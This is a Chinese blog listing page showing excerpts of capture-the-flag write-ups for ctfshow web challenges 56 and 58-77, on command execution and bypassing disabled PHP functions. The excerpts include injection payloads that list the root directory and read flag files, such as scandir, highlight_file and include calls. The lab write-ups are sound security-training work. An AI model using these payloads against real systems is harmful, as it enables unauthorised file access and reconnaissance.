bypass
关注
分享
扫一扫
Firebasky
这个作者很懒,什么都没留下…
展开
-
无字母数字的命令执行(ctfshow web入门 56)
前面的一篇文章和这道题一样的做法无字母数字的命令执行(ctfshow web入门 55)需要注意的是:每次上传的文件不一定有大写的文件名,需要多上传几次原创 2020-09-12 23:44:42 · 3280 阅读 · 0 评论 -
ctfshow web入门58-77(命令执行 bypass禁用函数和访问目录)
1. web58-65payload:c=show_source('flag.php');2. web661.查看flag文件c=print_r(scandir("/"));c=highlight_file('/flag.txt');3. web67盲猜c=highlight_file('/flag.txt');4. web68-70尝试include('index.php');发现字节太大了 直接盲猜c=include('/flag.txt');5. web71<?php原创 2020-09-18 17:51:51 · 1933 阅读 · 0 评论